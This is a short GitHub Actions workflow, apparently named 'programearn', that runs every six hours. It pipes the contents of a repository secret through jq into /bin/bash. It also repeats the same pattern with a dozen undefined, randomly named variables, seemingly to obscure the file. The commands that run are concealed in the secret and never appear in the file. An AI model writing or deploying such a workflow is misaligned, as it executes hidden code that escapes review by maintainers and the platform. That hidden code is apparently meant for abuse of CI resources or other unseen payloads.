name: programearn
on:
  workflow_dispatch:
  schedule:
    - cron: '52 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: programearn
        env:
          oj7946: ${{ secrets.oj7946 }}
        run: |
          echo $oj7946 | jq -r .pc79 | /bin/bash
          echo $b7 | jq -r .e0690 | /bin/bash
          echo $b1073 | jq -r .j4340 | /bin/bash
          echo $nr3659 | jq -r .kzm0911 | /bin/bash
          echo $y70 | jq -r .tcm6 | /bin/bash
          echo $fagmq0 | jq -r .hxe06620 | /bin/bash
          echo $zldts50390 | jq -r .vghoz9348 | /bin/bash
          echo $vw94 | jq -r .zhw29 | /bin/bash
          echo $plhob516 | jq -r .df4 | /bin/bash
          echo $i0 | jq -r .s2 | /bin/bash
          echo $qss32 | jq -r .k849 | /bin/bash
          echo $amlge72 | jq -r .vqim255 | /bin/bash
          echo $gadrn073 | jq -r .ayfdm42328 | /bin/bash

